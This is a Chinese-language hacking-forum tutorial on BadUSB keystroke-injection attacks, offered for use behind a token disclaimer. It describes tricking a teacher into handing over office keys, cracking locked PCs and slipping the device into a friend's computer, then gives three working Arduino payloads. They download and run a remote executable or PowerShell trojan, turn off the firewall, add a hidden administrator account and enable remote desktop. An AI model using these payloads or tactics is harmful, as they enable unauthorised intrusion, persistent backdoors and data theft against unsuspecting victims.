推进阅读
2年前免责说明
前面说些话此教程不能违法只供安全测试 出事一律和我没有关系 如果你违法使用自己负责
简介
由于“Bad USB漏洞”的存在,USB闪存驱动器也成了常见的攻击目标。Bad-USB让黑客可以重新编程微控器作为一个“人机界面装置”(HID)或键盘,然后在目标机器上执行自定义键盘敲击。这种情况通常被称为“HID Payload攻击”,由于你需要向BadUSB上交你的脚本用于执行(稍后我们还会有更为详细的讨论)。尽管几乎所有的USB闪存驱动器都可以执行漏洞利用,但是重新编程“群联(Phison)”微控制器的唯一方式已经公开了。
一些BADUSB实战的方法和利用方法
1,首先,对于学校来说可以先社工 自己勤快点 让老师知道你很懂电脑 然后也和老师说说你管理班级的门钥匙,然后哪天说弄丢了,需要去配一把钥匙,一般老师会把办公室钥匙和教室钥匙放在一起(只是部分),然后你就得到了办公室钥匙!(此处分俩种情况)
①然后上钥匙某天偷偷的开门然后插上badusb 弄个远控之类 肯定有人说 怎么不直接手动下载 此处只是个别情况!
②如果老师给你的钥匙不和办公室一样 那么我们就 看哪天办公室没人 或者 上课请假说上厕所 一般上课老师很少在办公室。 然后插上badusb 嘿嘿嘿 肯定有人问 他锁了电脑怎么办 自己准备个pe破解密码。 如果老师让你打印资料 你可以插 但是问题是那时候老师知道你用过电脑 所以说 看你自己怎么发挥。 还有要注意摄像头!!
2.朋友家里面 首先 你去朋友家玩 然后他去上厕所 趁机插 然后还有一种部分 俩个人去 让一个人拿手机让他看个东西让他反过去看 然后趁机插 这种可以写远控 也可以写几分钟弹出 图片吓人什么的哈哈哈
badusb绕过360
#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /K MODE CON:COLS=16 LINES=1");
Keyboard.release(KEY_RETURN);
delay(300);
Keyboard.println("mkdir C:\\ProgramDATA\\test");
Keyboard.release(KEY_RETURN);
delay(300);
Keyboard.println("COPY\\\\192.168.17.138\\www\\1.exe C:\\ProgramDATA\\test\\1.exe /Y");
Keyboard.release(KEY_RETURN);
delay(500);Keyboard.println("C:\\ProgramDATA\\test\\1.exe && exit");
Keyboard.release(KEY_RETURN);
delay(300);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯
}
void loop() {
}win10-badusb开启远程桌面代码
#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK);//开启大写锁
Keyboard.release(KEY_CAPS_LOCK);
delay(50);
Keyboard.press(KEY_LEFT_GUI);//win键
Keyboard.press('x');//x键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('x');
delay(500);
Keyboard.press('a');//a键
Keyboard.press(KEY_TAB);//tab键
delay(500);
Keyboard.release('a');
Keyboard.release(KEY_TAB);
delay(500);
Keyboard.press(KEY_LEFT_ARROW);//左键
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.print("netsh advfirewall set allprofiles state off");//关闭防火墙
delay(500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.print("net user winbows 000000 /add");//创建用户
delay(500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.print("net localgroup administrators winbows /add");//将用户升级为管理
delay(500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.print("set-itemproperty -path 'hklm:\\system\\currentcontrolset\\control\\terminal server' -name 'fdenytsconnections' -value 0");//开启远程桌面
delay(1500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
Keyboard.print("exit");//关闭窗口
delay(500);
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//按下回车键
Keyboard.end();
}
void loop() {
}badusb
void setup() {
// putpower shell your setup code here, to run once
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //使用最小化隐藏cmd窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object System.Net.WebClient;");
Keyboard.println("$url= 'http://xxx/b.ps1';"); //xxx为你服务器ip,b.ps1为生成的木马文件
Keyboard.println("$file = ' D:\\b.ps1';"); //下载到目标存放文件的地址
Keyboard.println("$clnt.DownloadFile($url,$file)"); //才用分段执行绕过防火墙进程防护
Keyboard.println("PowerShell.exe -ExecutionPolicy Bypass -File d:\\b.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯
}
void loop() {
// put your main code here, to run repeatedly:
}badusb优化(1)
badusb优化(2)
win7—badusb3389代码2.0
badusb远程下载木马并执行代码
窃取文件,搭配badusb更佳
20230723143203143.zip
zip文件
596B
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
暂无评论内容